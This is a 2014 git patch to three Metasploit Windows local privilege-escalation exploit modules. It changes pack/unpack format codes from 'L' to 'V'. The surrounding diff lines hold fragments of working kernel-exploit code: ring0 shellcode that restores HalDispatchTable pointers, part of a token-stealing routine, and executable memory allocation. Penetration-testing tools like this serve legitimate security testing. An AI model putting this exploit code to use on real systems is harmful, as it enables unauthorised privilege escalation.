From 0cc3bdfb351a1790584c63dde8fa2ea50016c286 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 15 Aug 2014 21:11:37 +0100
Subject: [PATCH] Moar bad packs

---
 modules/exploits/windows/local/mqac_write.rb         | 4 ++--
 modules/exploits/windows/local/ms_ndproxy.rb         | 6 +++---
 modules/exploits/windows/local/novell_client_nwfs.rb | 8 ++++----
 3 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index e8c3ae4b7f..68f01e41f2 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -123,8 +123,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
-                                                    [0xffff].pack('L'),
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
+                                                    [0xffff].pack('V'),
                                                     'MEM_COMMIT|MEM_RESERVE',
                                                     'PAGE_EXECUTE_READWRITE')
     end
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index f2206e79ed..69d3f6b993 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -90,15 +90,15 @@ class Metasploit3 < Msf::Exploit::Local
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('L')  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('L') # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     ring0_shellcode
   end
 
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('L'), nil, [length].pack('L'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('V'), nil, [length].pack('V'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
     unless proc.memory.writable?(address)
       vprint_error('Failed to allocate memory')
       return nil
diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb
index 90567648de..68c29882c8 100644
--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@@ -98,8 +98,8 @@ class Metasploit3 < Msf::Exploit::Local
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
     tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def fill_memory(proc, address, length, content)
 
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")